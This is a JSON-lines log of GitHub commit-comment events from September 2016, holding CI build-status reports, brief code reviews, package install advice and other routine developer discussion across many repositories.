{"id":"4506506925","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874898,"position":null,"line":null,"path":null,"commit_id":"4bc1e51415c0fd2f78ffc2853012f0a74678cbce","created_at":"2016-09-02T04:20:02Z","updated_at":"2016-09-02T04:20:02Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:20:02Z"}
{"id":"4506507217","type":"CommitCommentEvent","actor":{"login":"bruceceng"},"repo":{"name":"Rush/node-authenticate-pam"},"payload":{"comment":{"id":18874901,"position":null,"line":null,"path":null,"commit_id":"f5f1c64b35023ef685d3fd23e25a66d0da2890f9","created_at":"2016-09-02T04:20:11Z","updated_at":"2016-09-02T04:20:11Z","body":"I think that's it. I've been waiting over a month for my password to get old again so I could reproduce the problem so I must have missed this. Thanks."}},"created_at":"2016-09-02T04:20:11Z"}
{"id":"4506507824","type":"CommitCommentEvent","actor":{"login":"PetteriAimonen"},"repo":{"name":"nanopb/nanopb"},"payload":{"comment":{"id":18874902,"position":16,"line":167,"path":"docs/concepts.rst","commit_id":"62afd54964528c1fbd5ab802134f7e9ad912d904","created_at":"2016-09-02T04:20:25Z","updated_at":"2016-09-02T04:20:25Z","body":"Yes, it should indeed. I'll fix this."}},"created_at":"2016-09-02T04:20:25Z"}
{"id":"4506508040","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18874903,"position":null,"line":null,"path":null,"commit_id":"f23314f731e2ea997cab228d1a6c0408f2ea767f","created_at":"2016-09-02T04:20:31Z","updated_at":"2016-09-02T04:20:31Z","body":"Well, the two places I tried to use `constexpr` ended up being dead-ends. First was to use it on a boolean function in hopes the compiler would recognize dead code in an `if/then/else` and remove it. The second was a function parameter (existing code) in lieu of template parameter (requires new code). Also see [What is the function parameter equivalent of constexpr?](http://stackoverflow.com/q/39284065) on Stack Overflow."}},"created_at":"2016-09-02T04:20:31Z"}
{"id":"4506508615","type":"CommitCommentEvent","actor":{"login":"antpovzner"},"repo":{"name":"ewedel/pebble-sunclock"},"payload":{"comment":{"id":18874904,"position":null,"line":null,"path":null,"commit_id":"ec1a34366fbfec64d31e08b7658dad9ce0ea89d7","created_at":"2016-09-02T04:20:47Z","updated_at":"2016-09-02T04:20:47Z","body":"Hi,\r\nSorry to bother you, but is there any chance you could post a 3.3 compiled pbw file? As a Pebble Classic user, I can't load the latest version, and according to the comments above, compiling it myself from the source code would require a Linux installation on a virtual machine, which is shamefully beyond my tech skills.\r\nThank you!\r\nAnton"}},"created_at":"2016-09-02T04:20:47Z"}
{"id":"4506511707","type":"CommitCommentEvent","actor":{"login":"saransh2405"},"repo":{"name":"saransh2405/test_repo"},"payload":{"comment":{"id":18874912,"position":11,"line":11,"path":"LICENSE","commit_id":"a56a8bf5d12cc0e7468ac9bf1308a6dcd153ea9f","created_at":"2016-09-02T04:22:06Z","updated_at":"2016-09-02T04:22:06Z","body":"hmm this looks good."}},"created_at":"2016-09-02T04:22:06Z"}
{"id":"4506512107","type":"CommitCommentEvent","actor":{"login":"saransh2405"},"repo":{"name":"saransh2405/test_repo"},"payload":{"comment":{"id":18874913,"position":11,"line":11,"path":"LICENSE","commit_id":"a56a8bf5d12cc0e7468ac9bf1308a6dcd153ea9f","created_at":"2016-09-02T04:22:16Z","updated_at":"2016-09-02T04:22:16Z","body":"I know right"}},"created_at":"2016-09-02T04:22:16Z"}
{"id":"4506512474","type":"CommitCommentEvent","actor":{"login":"mstup"},"repo":{"name":"mstup/FirstAidKit"},"payload":{"comment":{"id":18874915,"position":18,"line":0,"path":"MedicalKit_Android/app/src/main/java/com/dynu/mys/medical/kit/activity/MedicamentInputActivity.java","commit_id":"ce5e8844b42bfca9b658eab677170a4217696e24","created_at":"2016-09-02T04:22:26Z","updated_at":"2016-09-02T04:22:26Z","body":"Don't hardcode messages in the code visible for end user."}},"created_at":"2016-09-02T04:22:26Z"}
{"id":"4506514039","type":"CommitCommentEvent","actor":{"login":"VoLuong"},"repo":{"name":"VoLuong/Awesome-Linux-Software"},"payload":{"comment":{"id":18874918,"position":null,"line":null,"path":null,"commit_id":"221e2ad4a7525dab6b62867a9e284be4271dd7d0","created_at":"2016-09-02T04:23:09Z","updated_at":"2016-09-02T04:23:09Z","body":"@alim0x  :>"}},"created_at":"2016-09-02T04:23:09Z"}
{"id":"4506516650","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874921,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T04:24:23Z","updated_at":"2016-09-02T04:24:23Z","body":"iteration (macumber) - Win64-Windows-7-VisualStudio-12: OK (2411 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T04:24:23Z"}
{"id":"4506519035","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874925,"position":null,"line":null,"path":null,"commit_id":"4bc1e51415c0fd2f78ffc2853012f0a74678cbce","created_at":"2016-09-02T04:25:31Z","updated_at":"2016-09-02T04:25:31Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-02T04:25:31Z"}
{"id":"4506519881","type":"CommitCommentEvent","actor":{"login":"pdias-cci"},"repo":{"name":"costaivo/MEAN-EmployeeReview"},"payload":{"comment":{"id":18874928,"position":12,"line":20,"path":"client/client/index.html","commit_id":"2b81700f4bd0fb131178feb6dfd762b04e056123","created_at":"2016-09-02T04:25:55Z","updated_at":"2016-09-02T04:25:55Z","body":"Download these JS and CSS file and add to the application JS/CSS folder."}},"created_at":"2016-09-02T04:25:55Z"}
{"id":"4506523901","type":"CommitCommentEvent","actor":{"login":"tomstringer"},"repo":{"name":"marcom-unimelb/matrix-controlled-environment"},"payload":{"comment":{"id":18874941,"position":null,"line":null,"path":null,"commit_id":"b8181161e681f71847f5c7939e8699b600d9905d","created_at":"2016-09-02T04:27:42Z","updated_at":"2016-09-02T04:27:42Z","body":"See attached - regex is doing something weird with the tags and not returning expected JSON\r\n![screen shot 2016-09-02 at 11 05 15 am](https://cloud.githubusercontent.com/assets/924501/18192622/5951eca0-7119-11e6-8c81-d93991df9eff.png)\r\n"}},"created_at":"2016-09-02T04:27:42Z"}
{"id":"4506524135","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874942,"position":null,"line":null,"path":null,"commit_id":"6260a69fb9253c437660f363515c01d8807fadec","created_at":"2016-09-02T04:27:48Z","updated_at":"2016-09-02T04:27:48Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:27:48Z"}
{"id":"4506524854","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18874944,"position":null,"line":null,"path":null,"commit_id":"bbdae918f79086c2608b737277d2d4c810f58a1a","created_at":"2016-09-02T04:28:10Z","updated_at":"2016-09-02T04:28:10Z","body":"各クラスのファイル名に `sanmoke_` がついているけど、このリポジトリにあるコードが三目並べに関わるものであることは、プロジェクト名からも分かることなので、なくてもいいんじゃないかな？\r\n\r\nあとファイル名にはsnake_caseを使いましょう\r\nhttps://github.com/fortissimo1997/ruby-style-guide/blob/japanese/README.ja.md#snake-case-files"}},"created_at":"2016-09-02T04:28:10Z"}
{"id":"4506525822","type":"CommitCommentEvent","actor":{"login":"chethan2807"},"repo":{"name":"chethan2807/My-Thesis"},"payload":{"comment":{"id":18874945,"position":null,"line":null,"path":null,"commit_id":"5783e7e36d29da8f0032b22685b9d61c2e8b5945","created_at":"2016-09-02T04:28:34Z","updated_at":"2016-09-02T04:28:34Z","body":"Exploring FPGA Overlay Network\r\nOn Chip"}},"created_at":"2016-09-02T04:28:34Z"}
{"id":"4506526081","type":"CommitCommentEvent","actor":{"login":"gsaidov"},"repo":{"name":"gsaidov/datasciencecoursera"},"payload":{"comment":{"id":18874946,"position":null,"line":null,"path":null,"commit_id":"ebd72a6ef18910531e5733f574a5ff9dde081b4c","created_at":"2016-09-02T04:28:40Z","updated_at":"2016-09-02T04:28:40Z","body":"A new file added"}},"created_at":"2016-09-02T04:28:40Z"}
{"id":"4506527766","type":"CommitCommentEvent","actor":{"login":"GiantFootUNeverKnow"},"repo":{"name":"GiantFootUNeverKnow/MMIS"},"payload":{"comment":{"id":18874950,"position":2,"line":2,"path":"scheduler.py","commit_id":"06fe81996da9971d1edd8e6da57fda562de2493c","created_at":"2016-09-02T04:29:30Z","updated_at":"2016-09-02T04:29:30Z","body":"Need some explanation here?"}},"created_at":"2016-09-02T04:29:30Z"}
{"id":"4506530668","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874954,"position":null,"line":null,"path":null,"commit_id":"6260a69fb9253c437660f363515c01d8807fadec","created_at":"2016-09-02T04:30:45Z","updated_at":"2016-09-02T04:30:45Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:30:45Z"}
{"id":"4506531501","type":"CommitCommentEvent","actor":{"login":"tomstringer"},"repo":{"name":"marcom-unimelb/matrix-controlled-environment"},"payload":{"comment":{"id":18874955,"position":null,"line":null,"path":null,"commit_id":"b8181161e681f71847f5c7939e8699b600d9905d","created_at":"2016-09-02T04:31:08Z","updated_at":"2016-09-02T04:31:08Z","body":"This is what the feed markup looks like. Seems \"topics\" have now snuck in among the \"category\" items...\r\n\r\n`<div class=\"field field-name-taxonomy-vocabulary-4 field-type-taxonomy-term-reference field-label-hidden\">\r\n    <div class=\"field-items\">\r\n        <div class=\"field-item even\">\r\n            <div class=\"topics\">\r\n              <a href=\"http://newsroom.melbourne.edu/topics/science-and-environments\">Science and the Environments</a>\r\n              <a href=\"http://newsroom.melbourne.edu/category/level-2-categories/science-and-environments\">Science and the Environments</a>\r\n              <a href=\"http://newsroom.melbourne.edu/category/level-2-categories/medicine-and-health-science\">Medicine and Health Science</a>\r\n            </div>\r\n        </div>\r\n    </div>\r\n</div>`"}},"created_at":"2016-09-02T04:31:08Z"}
{"id":"4506532378","type":"CommitCommentEvent","actor":{"login":"prepare"},"repo":{"name":"prepare/CefBridge"},"payload":{"comment":{"id":18874958,"position":27,"line":94,"path":"cefclient/browser/client_app_browser.cc","commit_id":"45f69f24e5dddf371dd1a2748036bb112fb182a3","created_at":"2016-09-02T04:31:30Z","updated_at":"2016-09-02T04:31:30Z","body":"important1\r\n"}},"created_at":"2016-09-02T04:31:30Z"}
{"id":"4506533040","type":"CommitCommentEvent","actor":{"login":"prepare"},"repo":{"name":"prepare/CefBridge"},"payload":{"comment":{"id":18874959,"position":37,"line":707,"path":"cefclient/browser/client_handler.cc","commit_id":"45f69f24e5dddf371dd1a2748036bb112fb182a3","created_at":"2016-09-02T04:31:50Z","updated_at":"2016-09-02T04:31:50Z","body":"important2"}},"created_at":"2016-09-02T04:31:50Z"}
{"id":"4506533725","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18874961,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T04:32:10Z","updated_at":"2016-09-02T04:32:10Z","body":"I fix it!\n\nhttps://github.com/TwistedScorpio/OTHire/issues/72#issuecomment-244267970"}},"created_at":"2016-09-02T04:32:10Z"}
{"id":"4506536199","type":"CommitCommentEvent","actor":{"login":"tomstringer"},"repo":{"name":"marcom-unimelb/matrix-controlled-environment"},"payload":{"comment":{"id":18874970,"position":null,"line":null,"path":null,"commit_id":"b8181161e681f71847f5c7939e8699b600d9905d","created_at":"2016-09-02T04:33:22Z","updated_at":"2016-09-02T04:33:22Z","body":"And here's the current REGEX:\r\n\r\n.+topics\">[^>]+>([^<]+)(</a><a[^>]+>([^<]+)).+\r\n$1,$3"}},"created_at":"2016-09-02T04:33:22Z"}
{"id":"4506536501","type":"CommitCommentEvent","actor":{"login":"ewedel"},"repo":{"name":"ewedel/pebble-sunclock"},"payload":{"comment":{"id":18874971,"position":null,"line":null,"path":null,"commit_id":"ec1a34366fbfec64d31e08b7658dad9ce0ea89d7","created_at":"2016-09-02T04:33:30Z","updated_at":"2016-09-02T04:33:30Z","body":"Hi @antpovzner.. that's a good idea. Am hoping to have time to look at fixing classic support over the coming (US) long weekend, but if that doesn't happen then I'll see about posting the last working (afaik) version. There are memory space issues with classic, not yet sure if I can work around them with the current code.\r\n\r\nAnother user mentioned that when I uploaded the most recent version with no classic support, it yanked the existing version off his classic watch. Which totally sucks, sorry didn't know that would happen."}},"created_at":"2016-09-02T04:33:30Z"}
{"id":"4506537544","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/bookdown"},"payload":{"comment":{"id":18874973,"position":null,"line":null,"path":null,"commit_id":"e3fd9861dcce1d398e60582d64a0afec36587c34","created_at":"2016-09-02T04:33:59Z","updated_at":"2016-09-02T04:33:59Z","body":"`install.packages()` won't work, since this change was made in the current development version, i.e. > 0.1 (not on CRAN yet). You need to `devtools::install_github('rstudio/bookdown')`"}},"created_at":"2016-09-02T04:33:59Z"}
{"id":"4506537846","type":"CommitCommentEvent","actor":{"login":"dineshsimhadri"},"repo":{"name":"dineshsimhadri/wireframe-1"},"payload":{"comment":{"id":18874974,"position":null,"line":null,"path":null,"commit_id":"1cd0a44800ef0b5fcd8aaf0dd69fd425cc7ce90c","created_at":"2016-09-02T04:34:08Z","updated_at":"2016-09-02T04:34:08Z","body":".."}},"created_at":"2016-09-02T04:34:08Z"}
{"id":"4506538459","type":"CommitCommentEvent","actor":{"login":"dineshsimhadri"},"repo":{"name":"dineshsimhadri/wireframe-1"},"payload":{"comment":{"id":18874977,"position":null,"line":null,"path":null,"commit_id":"1cd0a44800ef0b5fcd8aaf0dd69fd425cc7ce90c","created_at":"2016-09-02T04:34:22Z","updated_at":"2016-09-02T04:34:22Z","body":"..."}},"created_at":"2016-09-02T04:34:22Z"}
{"id":"4506538919","type":"CommitCommentEvent","actor":{"login":"goatandsheep"},"repo":{"name":"uid/005q"},"payload":{"comment":{"id":18874978,"position":null,"line":null,"path":null,"commit_id":"003710e6789f4a2cd1c0e2145bfb80900d73caef","created_at":"2016-09-02T04:34:32Z","updated_at":"2016-09-02T04:34:32Z","body":"does this work? Can you merge to the main branch?"}},"created_at":"2016-09-02T04:34:32Z"}
{"id":"4506541097","type":"CommitCommentEvent","actor":{"login":"rusoaica"},"repo":{"name":"rusoaica/JudgementDay"},"payload":{"comment":{"id":18874991,"position":20,"line":179,"path":"Assets/Scripts - In Game/GUI/MiniMapController.cs","commit_id":"13ef130a2bbde9619919912dfde9191c8a8f519f","created_at":"2016-09-02T04:35:25Z","updated_at":"2016-09-02T04:35:25Z","body":"Produces runtime issues (menu disappears, camera gets off terrain, etc)"}},"created_at":"2016-09-02T04:35:25Z"}
{"id":"4506542152","type":"CommitCommentEvent","actor":{"login":"GenjitsuGame"},"repo":{"name":"GenjitsuGame/cspspc"},"payload":{"comment":{"id":18874993,"position":3,"line":39,"path":"scripts/globals.lua","commit_id":"d34918f2b5fe147afddddd1277636b3b51de152f","created_at":"2016-09-02T04:35:57Z","updated_at":"2016-09-02T04:35:57Z","body":"The way it's supposed to work is :\r\n\r\nWhen you pick up a weapon, your active weapons change depending on which weapon you carry and which weapon you just picked up.\r\n\r\nThe priority order is RIFLE > PISTOL > GRENADE (you can't pick up a knife)"}},"created_at":"2016-09-02T04:35:57Z"}
{"id":"4506544732","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"ArchRPG/ARCore"},"payload":{"comment":{"id":18875000,"position":null,"line":null,"path":null,"commit_id":"6899ea7f34f03e77e6c67672b070920ee37666eb","created_at":"2016-09-02T04:37:11Z","updated_at":"2016-09-02T04:37:11Z","body":"wait, that's ARCore\\Pets da!"}},"created_at":"2016-09-02T04:37:11Z"}
{"id":"4506547092","type":"CommitCommentEvent","actor":{"login":"Junnie-Jobs"},"repo":{"name":"Junnie-Jobs/HTML5_Project"},"payload":{"comment":{"id":18875004,"position":14,"line":14,"path":"js/app.js","commit_id":"714d27494bd0079ac783766d4f795f426bb9123e","created_at":"2016-09-02T04:38:20Z","updated_at":"2016-09-02T04:38:20Z","body":"keyboard 객체를 이용하여 변경하였습니다.\r\nhttps://github.com/Junnie-Jobs/HTML5_Project/blob/master/js/rendering.js"}},"created_at":"2016-09-02T04:38:20Z"}
{"id":"4506549544","type":"CommitCommentEvent","actor":{"login":"bebraw"},"repo":{"name":"webpack/webpack.io"},"payload":{"comment":{"id":18875006,"position":null,"line":null,"path":null,"commit_id":"27ac88298b2fc961e4bda388d71d7cca6c45a8e3","created_at":"2016-09-02T04:39:31Z","updated_at":"2016-09-02T04:39:31Z","body":"Good catch. We should probably look into linting the content. There might be something for Markdown."}},"created_at":"2016-09-02T04:39:31Z"}
{"id":"4506555735","type":"CommitCommentEvent","actor":{"login":"yolshanskiy"},"repo":{"name":"yolshanskiy/hw_topics_in_game_th"},"payload":{"comment":{"id":18875017,"position":null,"line":null,"path":null,"commit_id":"a7dc484cba6c598f4ea7512c4b67d8ada9a6fa32","created_at":"2016-09-02T04:42:31Z","updated_at":"2016-09-02T04:42:31Z","body":"pararam"}},"created_at":"2016-09-02T04:42:31Z"}
{"id":"4506558014","type":"CommitCommentEvent","actor":{"login":"Ashleyabc"},"repo":{"name":"bluntos/ARMuseum"},"payload":{"comment":{"id":18875020,"position":null,"line":null,"path":null,"commit_id":"e5f74ae915e376ac3d44d3a3e35c64022e2d4630","created_at":"2016-09-02T04:43:45Z","updated_at":"2016-09-02T04:43:45Z","body":"import com.qualcomm.vuforia.Matrix44F;\r\nimport com.qualcomm.vuforia.Renderer;\r\nimport com.qualcomm.vuforia.Vec2F;\r\nimport com.qualcomm.vuforia.Vec3F;\r\nimport com.qualcomm.vuforia.Vec4F;\r\nimport com.qualcomm.vuforia.VideoBackgroundConfig;\r\n\r\n这些文件好像都没有了额。。能麻烦重新上传吗？？"}},"created_at":"2016-09-02T04:43:45Z"}
{"id":"4506558238","type":"CommitCommentEvent","actor":{"login":"chrisfilo"},"repo":{"name":"nipy/nipype"},"payload":{"comment":{"id":18875022,"position":21,"line":21,"path":"nipype/algorithms/tests/test_compcor.py","commit_id":"9e0d32796cec4ef237e2ccb2b7b74554f01c6ad8","created_at":"2016-09-02T04:43:52Z","updated_at":"2016-09-02T04:43:52Z","body":"Those files are empty (this is intentional - they are only used to test generation of command lines). These types of tests are written in nipype as part of docstrings containing examples (such as this one: https://github.com/nipy/nipype/blob/master/nipype/algorithms/modelgen.py#L255). nosetests finds those examples and runs them checking if the syntax is correct. Note that the interfaces are only set up but they never really run in the doctests examples.\r\n\r\nIf you want  to test running the interface you'll need to generate data on the fly (and then remove it after the test is done)."}},"created_at":"2016-09-02T04:43:52Z"}
{"id":"4506558539","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18875024,"position":null,"line":null,"path":null,"commit_id":"ac7205525c57b00da0ed812b255efa002aca2143","created_at":"2016-09-02T04:44:01Z","updated_at":"2016-09-02T04:44:01Z","body":"Fix #24 and #25 "}},"created_at":"2016-09-02T04:44:01Z"}
{"id":"4506559713","type":"CommitCommentEvent","actor":{"login":"ismayc"},"repo":{"name":"rstudio/bookdown"},"payload":{"comment":{"id":18875026,"position":null,"line":null,"path":null,"commit_id":"e3fd9861dcce1d398e60582d64a0afec36587c34","created_at":"2016-09-02T04:44:36Z","updated_at":"2016-09-02T04:44:36Z","body":"My apologies.  This is working on your bookdown-demo now.  Thanks for your time @yihui .  I thought mistakenly that bookdown was updated on CRAN but I read the version number wrong."}},"created_at":"2016-09-02T04:44:36Z"}
{"id":"4506560766","type":"CommitCommentEvent","actor":{"login":"leopard1"},"repo":{"name":"leopard1/MoviePool"},"payload":{"comment":{"id":18875028,"position":null,"line":null,"path":null,"commit_id":"a0429a802e491599089174e04e4408713d50ccd2","created_at":"2016-09-02T04:45:10Z","updated_at":"2016-09-02T04:45:10Z","body":"Why are you still playing with this project? "}},"created_at":"2016-09-02T04:45:10Z"}
{"id":"4506565107","type":"CommitCommentEvent","actor":{"login":"codyogden"},"repo":{"name":"codyogdenprime/group-fruit-market"},"payload":{"comment":{"id":18875032,"position":47,"line":47,"path":"group-fruit-market/index.html","commit_id":"d1b736c5e86997e55295005586aeb735c6a72abf","created_at":"2016-09-02T04:47:09Z","updated_at":"2016-09-02T04:47:09Z","body":"Awesome! The JavaScript for the total wallet cash has a target of `wallet-total`. If you add a `span` tag after \"Total Cash: $\" and give it the `wallet-total` ID, the wallet will update and run immediately after we merge."}},"created_at":"2016-09-02T04:47:09Z"}
{"id":"4506565781","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18875034,"position":null,"line":null,"path":null,"commit_id":"4bc1e51415c0fd2f78ffc2853012f0a74678cbce","created_at":"2016-09-02T04:47:28Z","updated_at":"2016-09-02T04:47:28Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:47:28Z"}
{"id":"4506566975","type":"CommitCommentEvent","actor":{"login":"1vasari"},"repo":{"name":"1vasari/rails-songdown"},"payload":{"comment":{"id":18875037,"position":null,"line":null,"path":null,"commit_id":"5c7a68acff7e75d0a42c786e6b98202ec840fb4b","created_at":"2016-09-02T04:48:05Z","updated_at":"2016-09-02T04:48:05Z","body":"This is really cool.\r\n"}},"created_at":"2016-09-02T04:48:05Z"}
{"id":"4506567137","type":"CommitCommentEvent","actor":{"login":"1vasari"},"repo":{"name":"1vasari/rails-songdown"},"payload":{"comment":{"id":18875039,"position":4,"line":10,"path":"README.md","commit_id":"5c7a68acff7e75d0a42c786e6b98202ec840fb4b","created_at":"2016-09-02T04:48:11Z","updated_at":"2016-09-02T04:48:11Z","body":"Cool"}},"created_at":"2016-09-02T04:48:11Z"}
{"id":"4506568816","type":"CommitCommentEvent","actor":{"login":"jgarcia162"},"repo":{"name":"RafatKhandaker/C4Q-HW"},"payload":{"comment":{"id":18875040,"position":null,"line":null,"path":null,"commit_id":"2a948629da2f7b7e46fe84ed8746fe0badb42937","created_at":"2016-09-02T04:49:02Z","updated_at":"2016-09-02T04:49:02Z","body":"**Question 6:**\r\nWe really don't need the foodValAt variable. \r\n**Question 8:**\r\nAvoid nested loops. We don't need that while loop inside a for loop. Incorporate the input into your while loop. Also what happens if the user inputs something that isn't a number? Your Scanner construction and int x initialization is not the right syntax, this wouldn't work.\r\n**Question 9:**\r\nYou may have misunderstood the question. If you need help clarifying anything please don't hesitate to ask. \r\n\r\n**##Things to watch out for**\r\n-Avoid using unnecessary variables. Approach your problems by asking \"what are the bare minimum things I need to know? Of these things I need to know, will I be using that information more than once? How much code does it require to gather this information?\" this will reduce the number of variables you create. While memory is cheap nowadays and small bits of information don't require a large amount, it is still best practice to optimize your program's memory efficiency. \r\n-Stay away from nested loops \r\n"}},"created_at":"2016-09-02T04:49:02Z"}
{"id":"4506571113","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/bookdown"},"payload":{"comment":{"id":18875041,"position":null,"line":null,"path":null,"commit_id":"e3fd9861dcce1d398e60582d64a0afec36587c34","created_at":"2016-09-02T04:50:14Z","updated_at":"2016-09-02T04:50:14Z","body":"No worries. When I say I fixed something, usually I mean I fixed it on Github, and the fix is unlikely to be immediately available on CRAN."}},"created_at":"2016-09-02T04:50:14Z"}
{"id":"4506571357","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18875042,"position":null,"line":null,"path":null,"commit_id":"4bc1e51415c0fd2f78ffc2853012f0a74678cbce","created_at":"2016-09-02T04:50:20Z","updated_at":"2016-09-02T04:50:20Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:50:20Z"}
{"id":"4506573505","type":"CommitCommentEvent","actor":{"login":"dufferzafar"},"repo":{"name":"iCHAIT/awesome-macOS"},"payload":{"comment":{"id":18875043,"position":null,"line":null,"path":null,"commit_id":"bc84087566cba3775c436c65b0cfd84fdf09c702","created_at":"2016-09-02T04:51:24Z","updated_at":"2016-09-02T04:51:24Z","body":"Sorry for directly committing on Master. I didn't realize I too have write access to the repository. :/"}},"created_at":"2016-09-02T04:51:24Z"}
{"id":"4506579392","type":"CommitCommentEvent","actor":{"login":"iCHAIT"},"repo":{"name":"iCHAIT/awesome-macOS"},"payload":{"comment":{"id":18875056,"position":null,"line":null,"path":null,"commit_id":"bc84087566cba3775c436c65b0cfd84fdf09c702","created_at":"2016-09-02T04:54:06Z","updated_at":"2016-09-02T04:54:06Z","body":"Looks good to me, anyway please be careful in the future!"}},"created_at":"2016-09-02T04:54:06Z"}
{"id":"4506586202","type":"CommitCommentEvent","actor":{"login":"Restnpieces"},"repo":{"name":"Restnpieces/Ubuntu"},"payload":{"comment":{"id":18875063,"position":40,"line":38,"path":"README.md","commit_id":"9ec2f36bb9992b389f412bc8f6cc63c7c697a8c7","created_at":"2016-09-02T04:57:19Z","updated_at":"2016-09-02T04:57:19Z","body":"ADD THIS!!!!!"}},"created_at":"2016-09-02T04:57:19Z"}
